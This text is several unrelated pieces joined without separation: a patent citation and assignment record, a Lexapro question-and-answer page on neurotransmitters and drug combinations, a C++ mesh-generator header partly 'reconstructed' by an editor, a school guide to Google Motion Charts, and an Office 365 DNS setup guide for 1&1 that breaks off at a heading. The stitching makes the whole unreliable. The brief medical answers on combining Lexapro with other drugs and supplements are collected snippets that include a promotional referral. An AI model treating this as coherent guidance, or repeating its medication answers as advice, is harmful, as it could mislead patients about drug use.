- US5313141 * (filed Apr 22, 1993; published May 17, 1994; Durel Corporation): Three terminal inverter for electroluminescent lamps

Referenced by (citing patents):
- US6043609 * (filed May 6, 1998; published Mar 28, 2000; E-Lite Technologies, Inc.): Control circuit and method for illuminating an electroluminescent panel
- US6072477 * (filed Mar 27, 1997; published Jun 6, 2000; Matsushita Electric Industrial Co., Ltd.): EL display and driving circuit for the same
- US6304039 (filed Aug 8, 2000; published Oct 16, 2001; E-Lite Technologies, Inc.): Power supply for illuminating an electro-luminescent panel
- US6376934 (filed Aug 18, 1999; published Apr 23, 2002; Sipex Corporation): Voltage waveform generator
- US6734836 * (filed Oct 12, 2001; published May 11, 2004; NEC Corporation): Current driving circuit
- US7545225 (filed Aug 10, 2006; published Jun 9, 2009; Multigig Inc.): Regeneration device for rotary traveling wave oscillator
- US8633774 (filed Dec 5, 2011; published Jan 21, 2014; Analog Devices, Inc.): Electronic pulse generator and oscillator
- US8669818 (filed Apr 30, 2012; published Mar 11, 2014; Analog Devices, Inc.): Wave reversing system and method for a rotary traveling wave oscillator
- CN100502219C (filed Oct 29, 2004; published Jun 17, 2009; Intersil Americas Inc.): Multiplexed high voltage DC-AC driver, transformer and voltage conversion method
- EP1922812A2 * (filed Aug 11, 2006; published May 21, 2008; Multigig Limited): Regeneration device for rotary traveling wave oscillator
- WO1999057618A1 * (filed May 3, 1999; published Nov 11, 1999; E-Lite Technologies, Inc.): Control circuit and method for illuminating an electroluminescent panel
- WO2007021983A2 * (filed Aug 11, 2006; published Feb 22, 2007; Multigig Ltd): Regeneration device for rotary traveling wave oscillator

Classifications

U.S. Classification: 315/169.3, 315/226, 315/209.00R, 315/224
International Classification: H05B33/08
Cooperative Classification: Y02B20/325, H05B33/08
European Classification: H05B33/08

Legal Events

- Mar 7, 1996 (AS, Assignment): Owner: Harris Corporation, Florida. Assignment of assignors interest; assignor: Wood, Grady McConnell. Reel/frame: 007901/0994. Effective date: 19960304.
- Sep 27, 1999 (AS, Assignment): Owner: Intersil Corporation, Florida. Assignment of assignors interest; assignor: Harris Corporation. Reel/frame: 010247/0043. Effective date: 19990813.
- Nov 8, 1999 (AS, Assignment)
- Apr 13, 2001 (FPAY, Fee payment): Year of fee payment: 4.
- Apr 14, 2005 (FPAY, Fee payment): Year of fee payment: 8.
- Apr 14, 2009 (FPAY, Fee payment): Year of fee payment: 12.
- May 5, 2010 (AS, Assignment): Owner: Morgan Stanley & Co. Incorporated, New York. Security agreement; assignors: Intersil Corporation; Techwell, Inc.; Intersil Communications, Inc.; and others. Reel/frame: 024329/0831. Effective date: 20100427.
- May 26, 2010 (AS, Assignment): Owner: Intersil Corporation, Florida. Release by secured party; assignor: Credit Suisse First Boston. Reel/frame: 024445/0049. Effective date: 20030306.
- Jul 1, 2014 (AS, Assignment): Owner: Intersil Americas Inc., California. Assignment of assignors interest; assignor: Intersil Communications, Inc. Reel/frame: 033262/0582. Effective date: 20011221. Owner: Intersil Communications, Inc., California. Change of name; assignor: Intersil Corporation. Reel/frame: 033261/0088. Effective date: 20010523. Owner: Intersil Americas LLC, California. Change of name; assignor: Intersil Americas Inc. Reel/frame: 033262/0819. Effective date: 20111223.
What neurotransmitter does Lexapro work on?

Escitalopram inhibits the reuptake of the neurotransmitter serotonin (5-HT) at the serotonin reuptake pump of the neuronal membrane of the presynaptic cell, thereby increasing levels of 5-HT within the synaptic cleft and enhancing the actions of serotonin on 5-HT1A autoreceptors.

Which neurotransmitters does Lexapro affect?

Lexapro (escitalopram) is an antidepressant which works by increasing neurotransmitter activity in the brain. It is a selective serotonin reuptake inhibitor, or SSRI-type medication, which only affects one type of neurotransmitter: serotonin.

Does Lexapro work on GABA?

Escitalopram was shown to have an antioxidant effect associated with an increase in GABA levels in frontal cortices and nucleus accumbens homogenates from rats exposed to chronic mild stress (Shalaby and Kamal, 2009).

What does Lexapro do to the brain?

It works by helping to restore the balance of a certain natural substance (serotonin) in the brain. Escitalopram belongs to a class of drugs known as selective serotonin reuptake inhibitors (SSRIs). It may improve your energy level and feelings of well-being and decrease nervousness.

Does Lexapro help neurotransmitters?

[Figure: Comparison of network centrality between placebo (left) and 20 milligrams escitalopram (right); orange colors indicate higher centrality. Three hours after the administration of escitalopram, the architecture of functional networks changes considerably.]

Can you take Lexapro and Wellbutrin together?

Clinical studies have shown that taking Wellbutrin and Lexapro together can produce beneficial results. Combining Wellbutrin and Lexapro can improve symptoms in depressed patients. Talk to your doctor or a Minded expert to find out if the combination might work for you.

What is dopamine vs serotonin?

Dopamine and serotonin regulate similar bodily functions but produce different effects. Dopamine regulates mood and muscle movement and plays a vital role in the brain's pleasure and reward systems. Serotonin helps regulate mood, sleep, and digestion.

Can you take ashwagandha and Lexapro?

No interactions were found between ashwagandha and Lexapro. This does not necessarily mean no interactions exist. Always consult your healthcare provider.

Do SSRIs lower glutamate?

"While the serotonergic component is immediately amplified following SSRI administration, the glutamate component is acutely suppressed and is only normalized after several days of drug treatment," says Fischer.

Can I take magnesium with Lexapro?

No interactions were found between Lexapro and magnesium oxide. This does not necessarily mean no interactions exist. Always consult your healthcare provider.

Does Lexapro affect dopamine?

Escitalopram (at a dose that affects memory consolidation) increased hippocampal serotonin levels fourfold without changing dopamine or noradrenaline.

Is serotonin a neurotransmitter?

Serotonin is perhaps best known as a neurotransmitter that modulates neural activity and a wide range of neuropsychological processes, and drugs that target serotonin receptors are used widely in psychiatry and neurology.

Does reuptake increase neurotransmitters?

The main objective of a reuptake inhibitor is to substantially decrease the rate by which neurotransmitters are reabsorbed into the presynaptic neuron, increasing the concentration of neurotransmitter in the synapse.
This increases neurotransmitter binding to pre- and postsynaptic neurotransmitter receptors.

Do any antidepressants increase GABA?

Repeated treatment of depressed subjects with either electroconvulsive therapy (2) or selective serotonin reuptake inhibitors (SSRIs) (3) increases total occipital GABA levels, suggesting that antidepressant treatments may have a common ability to increase GABA neurotransmission.

Do SSRIs increase GABA?

Conclusions: These findings extend previous work showing that SSRI treatment increases cortical GABA in depressed patients and suggest that this results from an action of SSRIs on GABA neurons rather than as a secondary consequence of mood improvement.

What antidepressants work on GABA?

Tricyclic antidepressants (TCAs) such as amitriptyline, imipramine, desipramine, nortriptyline, clomipramine, trimipramine, protriptyline and doxepin.
Developer Documentation

MeshGenerator.hpp

/*
 * MeshGenerator.hh
 *
 *  Created on: Mar 15, 2012
 *      Author: kremer
 */

#ifndef MESHGENERATOR_HH_
#define MESHGENERATOR_HH_

#include <iostream>   // added: std::cerr is used below
#include <vector>
#include <set>
#include <map>
#include <algorithm>
#include <cassert>    // added: assert is used below

#include <boost/shared_ptr.hpp>
#include <boost/progress.hpp>
#include <boost/tuple/tuple.hpp>
#include <boost/tuple/tuple_comparison.hpp>

#include <OpenVolumeMesh/Mesh/PolyhedralMesh.hh>
#include <OpenVolumeMesh/Geometry/VectorT.hh>

class MeshGenerator {
private:

    // Type aliases: the extracted listing dropped these lines, so they are
    // reconstructed here from the way the names are used below.
    typedef OpenVolumeMesh::Geometry::Vec3d Vec3d;
    typedef OpenVolumeMesh::VertexHandle VertexHandle;
    typedef OpenVolumeMesh::FaceHandle FaceHandle;
    typedef OpenVolumeMesh::HalfFaceHandle HalfFaceHandle;
    typedef OpenVolumeMesh::HalfEdgeHandle HalfEdgeHandle;

    typedef boost::tuple<VertexHandle, VertexHandle, VertexHandle> FaceTuple;

public:

    // Also reconstructed: the mesh type the generator writes into.
    typedef OpenVolumeMesh::GeometricPolyhedralMeshV3d PolyhedralMesh;

    MeshGenerator(PolyhedralMesh& _mesh) : v_component_(0), mesh_(_mesh), progress_() {}

    MeshGenerator(const MeshGenerator& _cpy) :
        v_component_(_cpy.v_component_),
        vertex_(0.0, 0.0, 0.0),
        c_vertices_(),
        faceMap_(),
        mesh_(_cpy.mesh_),
        progress_() {}

    // Collect one coordinate; every third component completes a vertex.
    void add_vertex_component(double _comp) {

        if(v_component_ > 2) {
            std::cerr << "Vertices of dimension higher than three not supported!" << std::endl;
            return;
        }
        vertex_[v_component_] = _comp;
        ++v_component_;
        if(v_component_ == 3) {
            add_vertex();
        }
    }

    void add_vertex() {

        OpenVolumeMesh::VertexHandle vh = mesh_.add_vertex(vertex_);
        //std::cerr << "Added vertex " << mesh_.vertex(vh) << std::endl;
        v_component_ = 0;
    }

    // Collect one 1-based vertex index; every fourth index completes a cell.
    void add_cell_vertex(unsigned int _idx) {

        assert(_idx > 0);

        c_vertices_.push_back(OpenVolumeMesh::VertexHandle((int)_idx - 1));
        if(c_vertices_.size() == 4) {

            add_tetrahedral_cell();
//            std::cerr << "Adding cell (" << c_vertices_[0] << ", " << c_vertices_[1] <<
//                ", " << c_vertices_[2] << ", " << c_vertices_[3] << ")" << std::endl;
            c_vertices_.clear();
        }
    }

    void set_num_cells(unsigned int _n) {

        if(progress_.get() == NULL) {
            progress_.reset(new boost::progress_display(_n));
        }
    }

    void add_tetrahedral_cell() {

        if(c_vertices_.size() != 4) {
            std::cerr << "The specified cell is not incident to four vertices!" << std::endl;
            return;
        }

        // Get cell's mid-point
        Vec3d midP(0.0, 0.0, 0.0);
        double valence = 0.0;
        for(std::vector<OpenVolumeMesh::VertexHandle>::const_iterator it = c_vertices_.begin();
                it != c_vertices_.end(); ++it) {
            midP += mesh_.vertex(*it);
            valence += 1.0;
        }
        midP /= valence;

        // Sort vertex vector
        std::sort(c_vertices_.begin(), c_vertices_.end());

        std::vector<FaceTuple> tuples;

        // Create face tuple for all vertex combinations
        tuples.push_back(FaceTuple(c_vertices_[0], c_vertices_[1], c_vertices_[2]));
        tuples.push_back(FaceTuple(c_vertices_[1], c_vertices_[2], c_vertices_[3]));
        tuples.push_back(FaceTuple(c_vertices_[0], c_vertices_[2], c_vertices_[3]));
        tuples.push_back(FaceTuple(c_vertices_[0], c_vertices_[1], c_vertices_[3]));

        // Collect cell's half-faces in here
        std::vector<HalfFaceHandle> cell_halffaces;

        for(std::vector<FaceTuple>::const_iterator it = tuples.begin();
                it != tuples.end(); ++it) {

            // Check if face exists for current tuple
            FaceMap::iterator f = faceMap_.find(*it);
            if(f == faceMap_.end()) {
                // Face does not exist, create it
                // Find right orientation, s.t. normal
                // points inside the cell

                Vec3d e1 = mesh_.vertex(it->get<1>()) - mesh_.vertex(it->get<0>());
                Vec3d e2 = mesh_.vertex(it->get<2>()) - mesh_.vertex(it->get<1>());

                // Get face normal (cross product)
                Vec3d n = (e1 % e2).normalize();

                std::vector<VertexHandle> v_vec;
                v_vec.push_back(it->get<0>());
                v_vec.push_back(it->get<1>());
                v_vec.push_back(it->get<2>());
                FaceHandle fh = mesh_.add_face(v_vec);

                // Add face to face map
                faceMap_[*it] = fh;

                // Check whether normal points inside cell
                if(((midP - mesh_.vertex(it->get<0>())) | n) > 0.0) {

                    // Normal points inside cell, just add half-face 0
                    // Add corresponding half-face to cell definition
                    cell_halffaces.push_back(mesh_.halfface_handle(fh, 0));

                } else {

                    // Normal points outside cell, just add half-face 1
                    // Add corresponding half-face to cell definition
                    cell_halffaces.push_back(mesh_.halfface_handle(fh, 1));
                }

            } else {

                // Face exists, find right orientation
                FaceHandle fh = f->second;

                std::vector<HalfEdgeHandle> hes = mesh_.face(fh).halfedges();

                assert(hes.size() == 3);

                Vec3d e1 = mesh_.vertex(mesh_.halfedge(hes[0]).to_vertex()) -
                           mesh_.vertex(mesh_.halfedge(hes[0]).from_vertex());
                Vec3d e2 = mesh_.vertex(mesh_.halfedge(hes[1]).to_vertex()) -
                           mesh_.vertex(mesh_.halfedge(hes[1]).from_vertex());

                Vec3d n = (e1 % e2).normalize();

                if(((midP - mesh_.vertex(mesh_.halfedge(hes[0]).from_vertex())) | n) > 0.0) {
                    // Normal points inside cell
                    cell_halffaces.push_back(mesh_.halfface_handle(fh, 0));
                } else {
                    // Normal points outside cell
                    cell_halffaces.push_back(mesh_.halfface_handle(fh, 1));
                }
            }
        }

        // Check whether cell definition contains four half-faces
        assert(cell_halffaces.size() == 4);

        // Finally, add cell (topology checks enabled in debug builds only)
#ifndef NDEBUG
        mesh_.add_cell(cell_halffaces, true);
#else
        mesh_.add_cell(cell_halffaces, false);
#endif

        // Increase progress counter
        if((progress_.get() != NULL) && (progress_->expected_count() != 0))
            ++(*progress_);
    }

private:

    typedef std::map<FaceTuple, OpenVolumeMesh::FaceHandle> FaceMap;

    unsigned int v_component_;
    Vec3d vertex_;   // reconstructed member: the vertex currently being assembled

    std::vector<VertexHandle> c_vertices_;

    FaceMap faceMap_;

    PolyhedralMesh& mesh_;

    boost::shared_ptr<boost::progress_display> progress_;
};

#endif /* MESHGENERATOR_HH_ */
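To show how the class above is meant to be driven, here is a minimal usage sketch. It is not part of the original file; it assumes the PolyhedralMesh typedef resolves to OpenVolumeMesh's GeometricPolyhedralMeshV3d (as reconstructed above), and the coordinates and 1-based cell indices are made-up sample data for a single tetrahedron.

#include "MeshGenerator.hpp"

int main() {
    // Assumed mesh type; must match the typedef the generator uses.
    MeshGenerator::PolyhedralMesh mesh;
    MeshGenerator generator(mesh);

    // Four vertices, fed one coordinate at a time; every third component
    // completes a vertex and triggers add_vertex() internally.
    const double coords[4][3] = {
        {0.0, 0.0, 0.0}, {1.0, 0.0, 0.0}, {0.0, 1.0, 0.0}, {0.0, 0.0, 1.0}
    };
    for (int v = 0; v < 4; ++v)
        for (int c = 0; c < 3; ++c)
            generator.add_vertex_component(coords[v][c]);

    // Cell vertices are passed with 1-based indices (file-format convention);
    // the fourth index triggers add_tetrahedral_cell() internally.
    generator.set_num_cells(1);
    for (unsigned int idx = 1; idx <= 4; ++idx)
        generator.add_cell_vertex(idx);

    return 0;
}

This mirrors how a file converter would feed the generator while parsing a tetrahedral mesh file: coordinates stream in one component at a time, and cells arrive as groups of four vertex indices.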
How To Make Your Own Google Motion Chart

Australian Curriculum:
The NSW Syllabuses for the Australian Curriculum require that students learn how to describe and represent mathematical situations in a variety of ways using mathematical terminology and conventions (MA3-1WM, MA3-3WM, MA3-18SP).

Resources:
There are two primary sources of teacher information for this project, plus student resources:

Teacher resources:
1. A Colour By Numbers activity plan for teachers.
2. A Google Charts Howto for teachers.

Student resources:
1. How to make your own Google Motion Charts for students (and teachers).
2. An on-line quiz/pretest and Motion Chart howto for students (and teachers).

Project:
This project is intended to provide a fun opportunity for students to learn something new about maths and genetics through the use of modern charting and data-visualisation tools. The information below will help introduce students to Google Motion Charts (a homework task), and help students learn how to collect and manage data and create their own charts. This project provides students with an opportunity to look at data and mathematics in a new way.

Introduction To Motion Charts:
Charts are visual displays designed to make it easier for people to understand quantities and the relationships between things. Google Apps includes a large collection of modern mathematical processing and charting tools. The 'Motion Chart' is one of these apps. A Motion Chart is a dynamic chart that displays and compares up to five data sets and tracks them over the course of time.

Video 1. Example Data Visualisation Using Motion Charts (what is possible)

Google Apps includes a large collection of charting options. Many of the Google charting options are easy enough for primary students to use, and this project provides a fun opportunity for students to put their charting skills to the test.

How To Create a Motion Chart Spreadsheet and/or Form:
The first column should contain entities (e.g. countries), the second is time (e.g. years), followed by 2-4 numeric or string columns. See the Google Motion Chart howto:

1. Decide what you want to show as bubbles (e.g. eye colours); put those in column 'A'.
2. The second column MUST include DATE values, in year, month/day/year, week number or quarter format. If linking a form to a sheet, the 'Timestamp' data should be located in the second column (column B; see https://support.google.com/docs/answer/1047434?hl=en).
3. There can be a minimum of two and a maximum of four additional columns (maximum total six columns including the Timestamp/Date column). These columns can contain either numeric or text data. Text data, for example, could be an indicator of the weather for a given day: "cloudy", "raining", or "clear". Columns that display numeric data will be available for selection in the chart options box for the 'X', 'Y', 'Color' and 'Size' axes of the motion chart. Columns containing text will only appear in the drop-down menu for 'Color'.

NOTE: When a spreadsheet is created by Google Forms, Google Forms adds a default Timestamp column. If you create a spreadsheet manually, then add the Timestamp column manually (if it is missing). In case of problems, the column layout and Timestamp columns are the most likely culprits.

Here is an example of column entries for a working spreadsheet:
Fig 1. Example spreadsheet entries for a working demo Motion Chart

Create The Example Interactive Motion Chart:
To get up and running with live testing:
1. Add a few test entries to the spreadsheet (three or four rows is enough).
2. From the sheet menu, click on: Insert → Chart.
3. Click on the Insert button in the bottom left-hand corner of the motion chart screen.
4. When done, select the option to save the chart in its own sheet (see docs).
5. See the section below titled 'Motion Chart Setup Details' for more detail.

Fig 3. Example Eye Colour spreadsheet for Motion Chart
Fig 3. Move new Motion Chart to own sheet

A data entry form has been created (ask your teacher for the link) to allow students to enter their own data, mix and match data categories, and investigate a variety of motion graphics within a single spreadsheet.

How To Display Data & Experiment with Motion Chart Display Settings
Key: see the numbered green arrows in the screenshot below. The display can be manipulated using a wide range of settings, as per the green arrows in the screen grabs below.

Fig 5. Example Eye Colour spreadsheet

Customise graph settings by adjusting the controls highlighted by the green arrows (see above).

KEY VALUES: Each number in the list below corresponds with a number on the green arrows above. Each chart display can (and should) be highly customised.
1. Select the type of chart displayed: bubble, bar or zig-zag graph TAB options
2. Click to open display - the bar chart display can be customised when open
3. Click to open display - the line chart display can be customised when open
4. Choose how colours are allocated to the items displayed in the chart (usually best to select 'Unique Colors')
5. Choose to display all bubbles the same size, or bubble size in proportion to a selected value
6. Select one or more checkboxes to turn on/off various item information bubbles
7. Select 'trails' to leave a trail showing history (for animated charts only)
8. Display a trail of values plotted (in this example, for 'green' eye colour values)
9. Change the displayed X axis scale between 'linear' or 'log' (also select 'Time' as the value to display on the X axis)
10. Set and freeze the time-line by dragging the play 'progress bar' (slider) left-right
11. Display the values that have been entered into the spreadsheet via the on-line form
12. Display the values that have been entered into the master spreadsheet (ABS CAS data set)
13. Display 'Chart 1' (ABS Data Motion Chart) or 'Chart 2' (Motion Chart for the student-entered data set)
14. An interactive slider button to the right of the Play button controls playback speed
15. Play or pause the Motion Chart animation
16. Select the data set to display on the Y axis via the 'pullout' menu options (see item #9 to choose items displayed on the X axis)
17. Display raw sheet value(s) on mouse-over of an item (in this case, item #18)
18. Toggle the X axis scale between 'linear' or 'log'

Hover the mouse over any of the settings; most (but not all) have some effect.

Fig 6. Example Eye Colour spreadsheet

Optionally, students may use an on-line form to enter and analyse additional data that they may collect from the "Colour By Numbers" project. Students may elect to create their own personal Motion Charts using an alternative data set (spreadsheet) of their own.

Fig 4. Example Eye Colour spreadsheet

Chart options make a huge difference to the understandability of the display.
For example, for the "Top 30 Countries" graph (above) it may not seem to make sense to display 'Persons' on both the X and Y axes (also set 'Size' = 'Persons', 'Color' = 'Unique Color' and the X axis scale to 'Log' instead of 'Lin(ear)')… but try it and see! Also, viewing the same data in different chart types will highlight different trends.

Pre-test, Base-line Charts & Maths Quiz: Check out the "Colour By Numbers" Flipped Classroom Student Homework & Assessment Task (a Google form-based Flubaroo quiz).

Colour By Numbers - Data Entry Form For LabGroups: Check out the "Colour By Numbers" Flipped Classroom maths project data entry form (for entering Labgroup data only).

All of the on-line tools discussed here are designed and supported by third parties. Providing detailed instruction in the use of these tools is beyond the scope of this document; please refer to the Google on-line knowledge base for more detail.

TechnoBabble (technical detail only - it can safely be ignored): Other Chart Formats, Links, Google Sheet Functions.

Eye Colour Motion Chart Configuration: The Motion Chart plots change or trend over time. Eye colours do not change (much) over time, so we create a 'sequence' of events instead of 'times' of events. To do that, we use a function to convert an event sequence (Class/Year numbers) into a time-formatted column:

=ARRAYFORMULA(D8:D500+2000)

Each iteration of the results provides the number of a particular eye colour found in a particular result set. These numbers will vary rather than trending. To provide some kind of meaningful information, all of the results are averaged and displayed in the final screen when the motion chart completes. (The first seven rows of the sheet are reserved for 2015 entries, which are outside of the form entry range.)
• We also "freeze" the first eight rows - you must freeze all rows that contain functions!
• Format the TotalColour column to display 2 decimal places.

=AVERAGE(FILTER(C8:C,A8:A="Blue"))
=AVERAGE(FILTER(C8:C,A8:A="Brown"))
=AVERAGE(FILTER(C8:C,A8:A="Green"))
=AVERAGE(FILTER(C8:C,A8:A="Grey"))
=AVERAGE(FILTER(C8:C,A8:A="Hazel"))
=AVERAGE(FILTER(C8:C,A8:A="Other"))

Fig 1. Sheet overview
Fig 2. Sheet Column Numbering/Year Function
Fig 3. Sheet Eye Colour Averaging Function

Custom Spreadsheet Functions: Google Spreadsheet functions list: https://support.google.com/docs/table/25273?hl=en

Q: How do I cumulatively sum only numbers that belong to a certain username (string) in a separate column? I'd like to use ARRAYFORMULA so cells autofill with data without dragging the formula manually. E.g. a
running total for user A:

User  Amount  Running Total for A
A     1       1
B     2
A     4       5
A     3       8
B     5
A     2       10

A: If the data starts in row 2, then try:

=ArrayFormula(IF(A2:A="A",SUMIF(IF(A2:A="A",ROW(A2:A),ROWS(A:A)+1),"<="&ROW(A2:A),B2:B),))

Applied to the eye colour columns:

Blue: =ArrayFormula(IF(D2:D="Blue",SUMIF(IF(D2:D="Blue",ROW(D2:D),ROWS(E:E)+1),"<="&ROW(D2:D),E2:E),))
Brown: =ArrayFormula(IF(D3:D="Brown",SUMIF(IF(D3:D="Brown",ROW(D3:D),ROWS(E:E)+1),"<="&ROW(D3:D),E3:E),))
Green: =ArrayFormula(IF(D4:D="Green",SUMIF(IF(D4:D="Green",ROW(D4:D),ROWS(E:E)+1),"<="&ROW(D4:D),E4:E),))

See also: http://webapps.stackexchange.com/questions/69778/arrayformula-to-compute-running-average-for-groups-of-rows

Simple per-colour totals:
Brown: =SUM(FILTER(E:E,D:D="Brown"))
Green: =SUM(FILTER(E:E,D:D="Green"))

Charting Google Form Responses - Base-line Assessment Form, Orientation & Homework Quiz: http://www.makeuseof.com/tag/how-to-use-google-forms-to-create-your-own-self-grading-quiz/

Prepare a Google Form to provide an on-line assessment and self-grading quiz. The example quiz used the Google Sheet add-on Flubaroo - a free tool that helps quickly grade multiple-choice and similar assignments:
• Computes average assignment score.
• Computes average score per question, and flags low-scoring questions.
• Displays a grade distribution graph.
• Option to email each student their grade, and an answer key.
• Ability to send individualized feedback to each student.
More detail is available on how to set up a Flubaroo quiz.

Fig. Google form with Student Response Sheet and Flubaroo Grades sheet.

Transpose Rows & Columns: In LibreOffice Calc, there is a way to "rotate" a spreadsheet so that rows become columns and columns become rows.
1. Select the cell range that you want to transpose.
2. Choose Edit - Cut.
3. Click the cell that is to be the top left cell in the result.
4. Choose Edit - Paste Special.
5. In the dialog, mark Paste all and Transpose.
6. If you now click OK, the columns and rows are transposed.
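Returning to the running-total question above: here is a short Python sketch (an illustration of the same logic, not part of the original wiki page) showing what the ArrayFormula computes - a cumulative sum that only advances on rows matching the target group:

    # Per-group running total, mirroring the ArrayFormula logic above.
    # Rows whose user doesn't match the target are left blank, as in the sheet.
    def running_totals(rows, target):
        total = 0
        out = []
        for user, amount in rows:
            if user == target:
                total += amount
                out.append(total)
            else:
                out.append(None)  # blank cell
        return out

    rows = [("A", 1), ("B", 2), ("A", 4), ("A", 3), ("B", 5), ("A", 2)]
    print(running_totals(rows, "A"))  # [1, None, 5, 8, None, 10]

The printed result matches the worked table above.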
Create DNS records at 1&1 Internet for Office 365

Caution: Note that 1&1 Internet doesn’t allow a domain to have both an MX record and a top-level Autodiscover CNAME record. This limits the ways in which you can configure Exchange Online for Office 365. There is a workaround, but we recommend employing it only if you already have experience with creating subdomains at 1&1 Internet.

If despite this service limitation you choose to manage your own Office 365 DNS records at 1&1 Internet, follow the steps in this article to verify your domain and to set up DNS records for email, Skype for Business Online, and so on. These are the main records to add. Follow the steps below or watch the video. (Need more help? Get support.)

After you add these records at 1&1 Internet, your domain will be set up to work with Office 365 services. To learn about web hosting and DNS for websites with Office 365, see Use a public website with Office 365.

Note: Typically it takes about 15 minutes for DNS changes to take effect. However, it can occasionally take longer for a change you've made to update across the Internet's DNS system. If you’re having trouble with mail flow or other issues after adding DNS records, see Troubleshoot issues after changing your domain name or DNS records.

Add a TXT record for verification

Before you use your domain with Office 365, we have to make sure that you own it. Your ability to log in to your account at your domain registrar and create the DNS record proves to Office 365 that you own the domain.

Note: This record is used only to verify that you own your domain; it doesn’t affect anything else. You can delete it later, if you like.

Follow the steps below or watch the video (start at 0:42).

1. To get started, go to your domains page at 1&1 Internet by using this link. You’ll be prompted to log in.
2. Choose Manage domains.
3. On the Domain Center page, find the domain that you want to update, and then choose the Panel (v) control for that domain.
4. In the Domain Settings area, choose Edit DNS Settings.
5. In the TXT and SRV Records section, choose Add Record. (You may have to scroll down.)
6. In the Add Record area, in the boxes for the new record, type or copy and paste the values below. (Select the Type value from the drop-down list.)
   - Type: TXT
   - Prefix/Name: (Leave this field empty.)
   - Value: MS=msXXXXXXXX (Note: this is an example. Use your specific Destination or Points to Address value here, from the table in Office 365. How do I find this?)
7. Choose Save.
8. Choose Save.
9. In the Edit DNS Settings dialog box, choose Yes.
10. Wait a few minutes before you continue, so that the record you just created can update across the Internet.

Now that you've added the record at your domain registrar's site, you'll go back to Office 365 and request Office 365 to look for the record. When Office 365 finds the correct TXT record, your domain is verified.

1. Go to the Domains page.
2. On the Domains page, choose the domain that you are verifying.
3. On the Setup page, choose Start setup.
4. On the Verify domain page, choose Verify.

Note: Typically it takes about 15 minutes for DNS changes to take effect. However, it can occasionally take longer for a change you've made to update across the Internet's DNS system.
If you’re having trouble with mail flow or other issues after adding DNS records, see Troubleshoot issues after changing your domain name or DNS records.

Back to top

Add an MX record so email for your domain will come to Office 365

Follow the steps below or watch the video (start at 3:22).

1. To get started, go to your domains page at 1&1 Internet by using this link. You’ll be prompted to log in.
2. Choose Manage domains.
3. On the Domain Center page, find the domain that you want to update, and then choose the Panel (v) control for that domain.
4. In the Domain Settings area, choose Edit DNS Settings.
5. In the MX Records section, in the Mail Exchanger (MX Record) area, select Other mail server. (You may have to scroll down.)
6. If there are any MX records already listed, delete each of them by selecting the record and then pressing the Delete key on your keyboard. (If there are no MX records already listed, continue to the next step.)
7. In the boxes for the MX 1 record, type or copy and paste the values below:
   - MX 1: <domain-key>.mail.protection.outlook.com (Note: get your <domain-key> from your Office 365 portal account. How do I find this?)
   - Priority: 10 (For more information about priority, see What is MX priority?)
8. Choose Save. (You may have to scroll down.)
9. In the Edit DNS Settings dialog box, choose Yes.

Back to top

Add the six CNAME records that are required for Office 365

1&1 Internet requires a workaround so that you can use an MX record together with the CNAME records that are required for Office 365 email services. This workaround requires you to create a set of subdomains at 1&1 Internet, and to assign them to CNAME records.

Important: Make sure that you have at least two available subdomains before starting this procedure. We recommend this solution only if you already have experience with creating subdomains at 1&1 Internet.

Back to top

Basic CNAME records

Follow the steps below or watch the video (start at 3:57).

1. To get started, go to your domains page at 1&1 Internet by using this link. You’ll be prompted to log in.
2. Choose Manage domains.
3. On the Domain Center page, find the domain that you want to update and then choose Manage Subdomains.

Now you’ll create two subdomains and set an Alias value for each. (This is required because 1&1 Internet supports only one top-level CNAME record, but Office 365 requires several CNAME records.) First, you’ll create the Autodiscover subdomain.

4. In the Subdomain Overview section, choose Create Subdomain.
5. In the Create Subdomain box for the new subdomain, type or copy and paste only the Create Subdomain value from the following pair. (You'll add the Alias value in a later step.)
   - Create Subdomain: autodiscover
   - Alias: autodiscover.outlook.com
6. Choose Create Subdomain.
7. In the Subdomain Overview section, locate the autodiscover subdomain that you just created, and then choose the Panel (v) control for that subdomain.
8. In the Subdomain Settings area, choose Edit DNS Settings.
9. In the A/AAAA Records (IP Addresses) section, in the IP address (A Record) area, select CNAME.
10.
In the Alias: box, type or copy and paste only the Alias value (autodiscover.outlook.com).
11. Select the check box for the I am aware disclaimer.
12. Choose Save.
13. In the Edit DNS Settings dialog box, choose Yes.

Now you'll create the second subdomain.

14. In the Subdomain Overview section, choose Create Subdomain.
15. In the Create Subdomain box for the new subdomain, type or copy and paste only the Create Subdomain value from the following pair. (You'll add the Alias value in a later step.)
   - Create Subdomain: msoid
   - Alias: clientconfig.microsoftonline-p.net
16. Choose Create Subdomain.
17. In the Subdomain Overview section, find the msoid subdomain that you just created, and then choose the Panel (v) control for that subdomain.
18. In the Subdomain Settings area, choose Edit DNS Settings.
19. In the A/AAAA Records (IP Addresses) section, in the IP address (A Record) area, select CNAME.
20. In the Alias: box, type or copy and paste only the Alias value (clientconfig.microsoftonline-p.net).
21. Select the check box for the I am aware disclaimer.
22. Choose Save.
23. In the Edit DNS Settings dialog box, choose Yes.

Additional CNAME records

The additional CNAME records created in the following procedure enable Skype for Business Online services. You will employ the same steps that you used to create the two CNAME records above.

1. Create the third subdomain (Lyncdiscover). In the Subdomain Overview section, choose Create Subdomain.
2. In the Create Subdomain box for the new subdomain, type or copy and paste only the Create Subdomain value from the following pair. (You'll add the Alias value in a later step.)
   - Create Subdomain: lyncdiscover
   - Alias: webdir.online.lync.com
3. Choose Create Subdomain.
4. On the Domain Center page, choose Manage Subdomains.
5. In the Subdomain Overview section, find the lyncdiscover subdomain that you just created, and then choose the Panel (v) control for that subdomain. In the Subdomain Settings area, choose Edit DNS Settings.
6. In the A/AAAA Records (IP Addresses) section, in the IP address (A Record) area, select CNAME.
7. In the Alias: box, type or copy and paste only the Alias value (webdir.online.lync.com).
8. Select the check box for the I am aware disclaimer, and then choose Save.
9. In the Edit DNS Settings dialog box, choose Yes.
10. Create the fourth subdomain (SIP): In the Subdomain Overview section, choose Create Subdomain.
11. In the Create Subdomain box for the new subdomain, type or copy and paste only the Create Subdomain value from the following pair. (You'll add the Alias value in a later step.)
   - Create Subdomain: sip
   - Alias: sipdir.online.lync.com
12. Choose Create Subdomain.
13. On the Domain Center page, choose Manage Subdomains.
14. In the Subdomain Overview section, find the sip subdomain that you just created, and then choose the Panel (v) control for that subdomain. In the Subdomain Settings area, choose Edit DNS Settings.
15. In the A/AAAA Records (IP Addresses) section, in the IP address (A Record) area, select CNAME.
16.
In the Alias: box, type or copy and paste only the Alias value (sipdir.online.lync.com).
17. Select the check box for the I am aware disclaimer, and then choose Save.
18. In the Edit DNS Settings dialog box, choose Yes.

CNAME records needed for MDM

